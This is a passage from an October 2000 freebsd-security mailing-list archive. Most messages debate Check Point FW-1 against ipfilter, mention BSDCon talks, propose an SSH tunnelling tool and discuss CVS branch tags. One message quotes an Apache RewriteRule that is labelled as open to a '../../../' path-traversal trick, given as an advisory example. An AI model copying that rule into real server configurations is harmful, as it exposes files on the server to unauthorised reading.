wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 12:57:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 30FCD37B503 for ; Sun, 8 Oct 2000 12:57:21 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 12:56:01 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e98JvFU83205; Sun, 8 Oct 2000 12:57:15 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 12:57:15 -0700 From: "Crist J . Clark" To: Brian Reichert Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008125715.T25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <39DEBB51.E51BACFB@allmaui.com> <20001007133304.B54883@numachi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001007133304.B54883@numachi.com>; from reichert@numachi.com on Sat, Oct 07, 2000 at 01:33:04PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote: > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > I found that Checkpoint 4.0 (this may have changed) doesn't do NAT > right; it uses NAT across _all_ interfaces, instead of letting you > pick one. Right, it determines whether to do NAT by source address, destination address, and destination port. Actually, it is not possible to do _anything_ per interface from the GUI. Wouldn't it be nice (and wouldn't you expect a firewall to be able) to block anything not destined for a small block of registered IPs at the external interface? Well, you can't put a rule to do that in the GUI. > This means if you have two internal nets that are connected to the > firewall box, the traffic between them seems as if it's coming fro > mthe public interface. This can confuse ACLs... Yep, you end up writing extra rules to make the NAT work by the source and destination addresses if you stick to the GUI alone. > (You suppose can Do the Right Thing, but their silly GUI tool > imposes a ton of work on you to accomplish it...) Exactly, another reason for the I Hate GUIs attitude. People, including several people in this thread, say how neat-o the FW-1 GUI is. However, if you want to do anything serious with the firewall, you need to hack the scripts the GUI generates (the GUI generates scripts which are what is read by the actual firewall daemons, called "INSPECT" scripts or something?). It ends up that you need to either write really contorted (and typically less secure) rules to simulate a rule on an interface or you need to hack the scripts manually (you _can_ specify per interface rules in the scripts). Don't get me started on the GUI log viewer. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13: 3: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id C2AF837B503 for ; Sun, 8 Oct 2000 13:03:03 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 13:01:46 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e98K31m83260; Sun, 8 Oct 2000 13:03:01 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 13:03:01 -0700 From: "Crist J . Clark" To: "Jeffrey J. Mountin" Cc: David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008130301.U25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010080427.PAA19412@cairo.anu.edu.au> <4.3.2.20001008070308.00b9ae90@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.2.20001008070308.00b9ae90@207.227.119.2>; from jeff-ml@mountin.net on Sun, Oct 08, 2000 at 07:13:17AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 07:13:17AM -0500, Jeffrey J. Mountin wrote: [snip] > Another reason why they may not wish to go with "in-house" talent is the > idea to out source. Companies do this so they don't have to pay for a > full-time employee or reallocate internal resources for projects. In some > cases it is worthwhile. Other times it's an endless black hole. Can only > blame the suits for taking this idea too far at times. Another reason, and this is not necessarily the management's fault, is the lack of qualified people available. At least this is the case in many, if not most, parts of the US. There are a lot of qualified people who are only interested in doing contract work. If you have the choice of hiring, (a) no one, (b) a not-qualified full time person, or (c) a qualified contract person, for a job that needs to be done NOW, what choice does management really have? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13:12:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id DAA2237B66C for ; Sun, 8 Oct 2000 13:12:31 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 13:10:24 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e98KBPq83322; Sun, 8 Oct 2000 13:11:25 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 13:11:25 -0700 From: "Crist J . Clark" To: Wes Peters Cc: Bill Fumerola , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008131125.V25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <39E0A273.E2243C9A@softweyr.com>; from wes@softweyr.com on Sun, Oct 08, 2000 at 10:36:03AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 10:36:03AM -0600, Wes Peters wrote: > Bill Fumerola wrote: > > > > On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > > > > > Others have mentioned a couple of commercial alternatives; add NetMax and > > > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > > > for BSDCon explaining why my company decided to use BSD and ipfilter to > > > build the firewall of the future on. (Sorry, it's not a corporate firewall > > > and is not suited for your use.) > > > > As long as Wes is plugging his talk, mine will be talking about ipfw and stopping > > attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking > > forward to attending. Firewalls are well represented at this years BSDcon. > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > a refutation of the orinal writer's "the bosses want to go with a commercial > solution". This is going to be a great Con, and surprise surprise security is > THE hot topic this year. That seems somewhat funny since SANS is having a confrence in Monterey at the same time. Where will papers or presentation materials be published? I won't be able to attend the BSDcon since I'll be at SANS all day all week, but I would like to get some of the papers and/or presentation materials (slides, handout notes, etc.), especially security related ones. I have already checked the www.bsdcon.com site and could not find any information on this (unless the website added it recently). Does one need to track down individual presenters? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13:48: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 5EC0937B502 for ; Sun, 8 Oct 2000 13:47:54 -0700 (PDT) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id QAA46323; Sun, 8 Oct 2000 16:47:52 -0400 (EDT) Date: Sun, 8 Oct 2000 16:47:52 -0400 (EDT) From: To: "Crist J . Clark" Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <20001008131125.V25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 8 Oct 2000, Crist J . Clark wrote: > Where will papers or presentation materials be published? I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? No I do not believe so. Last year all the papers or I believe all were put on the bsdcon's website. So I believe they will be this year as well. Which is really nice for those who could not attend ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 14: 1:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 6257537B503 for ; Sun, 8 Oct 2000 14:01:43 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA01849; Sun, 8 Oct 2000 15:01:34 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id PAA15915; Sun, 8 Oct 2000 15:01:33 -0600 (MDT) (envelope-from nate) Date: Sun, 8 Oct 2000 15:01:33 -0600 (MDT) Message-Id: <200010082101.PAA15915@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Darren Reed Cc: craig@allmaui.com (Craig Cowen), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) Subject: Re: Check Point FW-1 In-Reply-To: <200010070747.SAA26913@cairo.anu.edu.au> References: <39DEBB51.E51BACFB@allmaui.com> <200010070747.SAA26913@cairo.anu.edu.au> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > Tell them that IP Filter is the software which protects Firewall-1 from > the Internet when running on Solaris - you have to go with naked FW-1 on > NT. There are two factors to this equation, however. FW-1 is typically > deployed on Solaris/NT machines although now the Nokia box makes up a > large number of those sales. The Nokia boxes run IPSO which was, long > ago, FreeBSD (I'm told it no longer bears much resemblence). Not completely true. I've heard rumors that underneath it's still pretty much FreeBSD, and they may be updating the packeage to FreBSD 4.1R 'Real Soon Now'. The biggest fator seems to be the silly license scheme that CheckPoint uses for 'porting' to other platforms. Nate - Not officially associated with the group @ Nokia that builds the boxes, although I have met a few of them as they are in the same building as my group at Nokia. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 14: 9: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 5216837B503 for ; Sun, 8 Oct 2000 14:09:04 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id B3A8F1C6B; Sun, 8 Oct 2000 17:08:51 -0400 (EDT) Date: Sun, 8 Oct 2000 17:08:51 -0400 From: Bill Fumerola To: cjclark@alum.mit.edu Cc: Wes Peters , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008170851.A38472@jade.chc-chimes.com> References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> <20001008131125.V25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001008131125.V25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Sun, Oct 08, 2000 at 01:11:25PM -0700 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 01:11:25PM -0700, Crist J . Clark wrote: > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > > a refutation of the orinal writer's "the bosses want to go with a commercial > > solution". This is going to be a great Con, and surprise surprise security is > > THE hot topic this year. > > That seems somewhat funny since SANS is having a confrence in Monterey > at the same time. > > Where will papers or presentation materials be published? I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? Not speaking for the other presenters but I'll have all materials used in the talk available in people.freebsd.org/~billf/ somewhere. I'd make them available now, but I haven't written them yet. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org PS. Unless you're Jim Mock, in which case they're all done and I'm all ready. No worries. :-> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 15:45:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id EA41137B502 for ; Sun, 8 Oct 2000 15:45:15 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iPMJ-0001RE-00; Sun, 08 Oct 2000 16:55:55 -0600 Message-ID: <39E0FB7B.E01EA57A@softweyr.com> Date: Sun, 08 Oct 2000 16:55:55 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: "Jeffrey J. Mountin" , David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <200010080427.PAA19412@cairo.anu.edu.au> <4.3.2.20001008070308.00b9ae90@207.227.119.2> <20001008130301.U25121@149.211.6.64.reflexcom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Crist J . Clark" wrote: > > On Sun, Oct 08, 2000 at 07:13:17AM -0500, Jeffrey J. Mountin wrote: > > [snip] > > > Another reason why they may not wish to go with "in-house" talent is the > > idea to out source. Companies do this so they don't have to pay for a > > full-time employee or reallocate internal resources for projects. In some > > cases it is worthwhile. Other times it's an endless black hole. Can only > > blame the suits for taking this idea too far at times. > > Another reason, and this is not necessarily the management's fault, is > the lack of qualified people available. At least this is the case in > many, if not most, parts of the US. There are a lot of qualified > people who are only interested in doing contract work. If you have the > choice of hiring, (a) no one, (b) a not-qualified full time person, or > (c) a qualified contract person, for a job that needs to be done NOW, > what choice does management really have? The same one they always choose, (d) yank some secretary or janitor in, tell them it is now their job to "make the computers secure", and threaten to fire them if it isn't done yesterday at no cost. This is the main reason the internet is such a happy hunting ground for script kiddies. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 15:47:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 1CE1037B502 for ; Sun, 8 Oct 2000 15:47:37 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iPO3-0001RG-00; Sun, 08 Oct 2000 16:57:43 -0600 Message-ID: <39E0FBE7.31112DF5@softweyr.com> Date: Sun, 08 Oct 2000 16:57:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@alum.mit.edu Cc: Bill Fumerola , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> <20001008131125.V25121@149.211.6.64.reflexcom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Crist J . Clark" wrote: > > On Sun, Oct 08, 2000 at 10:36:03AM -0600, Wes Peters wrote: > > Bill Fumerola wrote: > > > > > > On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > > > > > > > Others have mentioned a couple of commercial alternatives; add NetMax and > > > > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > > > > for BSDCon explaining why my company decided to use BSD and ipfilter to > > > > build the firewall of the future on. (Sorry, it's not a corporate firewall > > > > and is not suited for your use.) > > > > > > As long as Wes is plugging his talk, mine will be talking about ipfw and stopping > > > attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking > > > forward to attending. Firewalls are well represented at this years BSDcon. > > > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > > a refutation of the orinal writer's "the bosses want to go with a commercial > > solution". This is going to be a great Con, and surprise surprise security is > > THE hot topic this year. > > That seems somewhat funny since SANS is having a confrence in Monterey > at the same time. > > Where will papers or presentation materials be published? I won't be > able to attend the BSDcon since I'll be at SANS all day all week, but > I would like to get some of the papers and/or presentation materials > (slides, handout notes, etc.), especially security related ones. I > have already checked the www.bsdcon.com site and could not find any > information on this (unless the website added it recently). Does one > need to track down individual presenters? I assume the conference proceedings will be available after the conference. Feel free to come over and hang around for dinner, too. Maybe we should see if we can setup an informal meeting for BSD'ers attending the SANS conference one night. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 16: 0:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from hand.dotat.at (hand.dotat.at [212.240.134.135]) by hub.freebsd.org (Postfix) with ESMTP id 97B2337B66C for ; Sun, 8 Oct 2000 16:00:32 -0700 (PDT) Received: from fanf by hand.dotat.at with local (Exim 3.15 #3) id 13iPPE-000ISM-00; Sun, 08 Oct 2000 22:58:56 +0000 Date: Sun, 8 Oct 2000 22:58:55 +0000 From: Tony Finch To: "Andrey A. Chernov" Cc: security@freebsd.org Subject: Re: A new problem in apache ? Message-ID: <20001008225855.E12691@hand.dotat.at> References: <200010010102.VAA41966@giganda.komkon.org> <20001001053035.A26403@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001001053035.A26403@nagual.pp.ru> Organization: Covalent Technologies, Inc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Andrey A. Chernov" wrote: > >> Here are some example RewriteRule directives. The first is vulnerable, but the others are not >> >> RewriteRule /test/(.*) /usr/local/data/test-stuff/$1 > >Looks like famous ../../../ trick can be used. Yes, but you have to be reasonably cunning to get a ../../../.. into the path whilst avoiding the checks for it. I've posted more information about this problem to bugtraq. Tony. -- en oeccget g mtcaa f.a.n.finch v spdlkishrhtewe y dot@dotat.at eatp o v eiti i d. fanf@covalent.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 16: 3:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B891F37B66C for ; Sun, 8 Oct 2000 16:03:13 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13iPTI-0004u0-00; Mon, 09 Oct 2000 01:03:08 +0200 Date: Mon, 9 Oct 2000 01:03:08 +0200 (IST) From: Roman Shterenzon To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Check Point FW-1 In-Reply-To: <20001008125715.T25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 8 Oct 2000, Crist J . Clark wrote: > On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote: > > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > > The big cheeses at work want to use check point instead of ipf or any > > > other open source solution. > > > Can anybody help me with vunerabilities to this so that I can change > > > thier minds? > > > > I found that Checkpoint 4.0 (this may have changed) doesn't do NAT > > right; it uses NAT across _all_ interfaces, instead of letting you > > pick one. > > Right, it determines whether to do NAT by source address, destination > address, and destination port. Actually, it is not possible to do > _anything_ per interface from the GUI. Wouldn't it be nice (and > wouldn't you expect a firewall to be able) to block anything not > destined for a small block of registered IPs at the external > interface? Well, you can't put a rule to do that in the GUI. That's rule 0 - it does antispoofing stuff. It's really simple. From the GUI. Now, does it have anything to do with FreeBSD-security? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 22:51:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id BDCE337B503; Sun, 8 Oct 2000 22:51:30 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 22:50:11 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e995pPu86287; Sun, 8 Oct 2000 22:51:25 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 22:51:25 -0700 From: "Crist J . Clark" To: Roman Shterenzon Cc: cjclark@alum.mit.edu, freebsd-chat@freebsd.org Subject: Re: Check Point FW-1 Message-ID: <20001008225125.A25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20001008125715.T25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from roman@xpert.com on Mon, Oct 09, 2000 at 01:03:08AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 09, 2000 at 01:03:08AM +0200, Roman Shterenzon wrote: > On Sun, 8 Oct 2000, Crist J . Clark wrote: > > > On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote: > > > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > > > The big cheeses at work want to use check point instead of ipf or any > > > > other open source solution. > > > > Can anybody help me with vunerabilities to this so that I can change > > > > thier minds? > > > > > > I found that Checkpoint 4.0 (this may have changed) doesn't do NAT > > > right; it uses NAT across _all_ interfaces, instead of letting you > > > pick one. > > > > Right, it determines whether to do NAT by source address, destination > > address, and destination port. Actually, it is not possible to do > > _anything_ per interface from the GUI. Wouldn't it be nice (and > > wouldn't you expect a firewall to be able) to block anything not > > destined for a small block of registered IPs at the external > > interface? Well, you can't put a rule to do that in the GUI. > > That's rule 0 - it does antispoofing stuff. > It's really simple. From the GUI. It's only simple if you have only a LAN behind the box. If you've got multiple, non-adjacent logical netblocks routed behind the box, it is non-trivial to setup the "built-in" antispoofing. > Now, does it have anything to do with FreeBSD-security? Not much anymore, redirected to -chat if anyone still cares. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 23: 0: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from femail2.sdc1.sfba.home.com (femail2.sdc1.sfba.home.com [24.0.95.82]) by hub.freebsd.org (Postfix) with ESMTP id 6EAA537B503 for ; Sun, 8 Oct 2000 23:00:05 -0700 (PDT) Received: from mike.home.net ([24.7.95.143]) by femail2.sdc1.sfba.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001009055955.IRQY27630.femail2.sdc1.sfba.home.com@mike.home.net> for ; Sun, 8 Oct 2000 22:59:55 -0700 Message-Id: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> X-Sender: mpthompson@mail.smateo1.sfba.home.com X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 08 Oct 2000 22:56:48 -0700 To: freebsd-security@freebsd.org From: Mike Thompson Subject: Encrypted IP tunneling solution Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've created a fairly simple little application called stun that essentially combines the functionality of nos-tun with SSH. Stun does for IP tunneling what sftp does for FTP -- it makes it trivial to set up the highly secure tunneling of raw IP packets between any two FreeBSD systems that have SSH and tunneling devices (/dev/tunXX) enabled. Although similar functionality can be had with binding a PPP socket to SSH or setting up IPSEC, I found that neither of these solutions were very easy to implement correctly. I wanted something that would bit simpler for someone with limited Unix admin skills to get working in a reliable manner. My purpose behind this email is to gauge the interest this little application. I currently have it implemented at the experimental stage right now where it seems to work well, but it has not been extensively tested. Unfortunately my time is very limited to work on this, but if there is sufficient interest I would be glad to help someone else evolve it to the point where it is proven to work well and can be contributed to the FreeBSD ports collection. If you are interested, let me know. I'm more than happy to share it, but I guess I'll have to slap a BSD style copyright on the source code first :-). Also, if you know of a similar application already in existence, please let me know so I don't waste my time. BTW, my ultimate goal behind this little application is to get it working with Windows clients running SSH protocols where it can serve as a very simple, but secure VPN solution. As one might expect, it has proven to be much easier to write the FreeBSD/Unix side of things than the Windows side where a virtual NDIS VxD driver or some similar beast will have to be implemented. Mike Thompson mike@atomz.com CTO/Co-Founder Atomz.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 23: 9:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com [135.207.30.103]) by hub.freebsd.org (Postfix) with ESMTP id 5FE6B37B502; Sun, 8 Oct 2000 23:09:13 -0700 (PDT) Received: from alliance.research.att.com (alliance.research.att.com [135.207.26.26]) by mail-green.research.att.com (Postfix) with ESMTP id 14C561E054; Mon, 9 Oct 2000 02:09:00 -0400 (EDT) Received: from windsor.research.att.com (windsor.research.att.com [135.207.26.46]) by alliance.research.att.com (8.8.7/8.8.7) with ESMTP id CAA00325; Mon, 9 Oct 2000 02:08:59 -0400 (EDT) From: Bill Fenner Received: (from fenner@localhost) by windsor.research.att.com (8.8.8+Sun/8.8.5) id XAA13132; Sun, 8 Oct 2000 23:08:58 -0700 (PDT) Message-Id: <200010090608.XAA13132@windsor.research.att.com> MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII To: eivind@yes.no Subject: Re: Stable branch Cc: freebsd-security@freebsd.org, cvs-committers@freebsd.org References: <4.3.2.20001007214506.00bb7c10@207.227.119.2> <20001008131908.B78013@warning.follo.net> Date: Sun, 8 Oct 2000 23:08:57 -0700 Versions: dmail (solaris) 2.2g/makemail 2.9a Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Warner's technique of adding the branch tag for only those files we actually >modify would negate the 30-byte cost, but I don't think it is worthwhile. >If we want to negate that cost, it'd be better to mod CVS to be able to >easily reference the base of a branch tag (as the branch point tag is done >to get around problems in the CVS user interface.) A front end to add the branch point tag after the fact is be pretty trivial. I just wrote freefall:~fenner/bin/tagbp as a proof of concept; it could obviously use a little more error checking but it gets the revision right on everything I tried it on. Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 2:10:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from 